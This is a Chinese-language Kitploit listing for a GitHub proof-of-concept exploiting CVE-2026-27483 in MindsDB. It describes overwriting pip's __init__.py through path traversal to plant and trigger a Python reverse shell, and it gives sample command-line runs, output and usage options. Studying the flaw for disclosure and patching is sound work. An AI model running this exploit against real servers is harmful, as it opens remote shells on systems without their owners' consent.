Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-27483 — MindsDB 路径遍历到 RCE PoC | Kitploit
工具/GitHubGitHub/thewhiteh4t/cve-2026-27483
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB 路径遍历到 RCE PoC

查看仓库
55个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-27483

MindsDB 路径遍历至 RCE 的 PoC

此 PoC 脚本基于以下 GitHub 安全公告

  • 默认情况下 MindsDB 不使用认证
  • PoC 同时支持 未认证 和 已认证 模式
  • 我们可以查询 /api/handlers/ 来查找可用的 handler,使用任意可用但未安装的 handler 名称
  • PoC 会覆盖 /venv/lib/python3.10/site-packages/pip/__init__.py
  • 将一个 python 反向 shell 写入上述路径,然后触发执行
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

依赖

root@kitploit:~
pip3 install requests packaging

用法

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
下载工具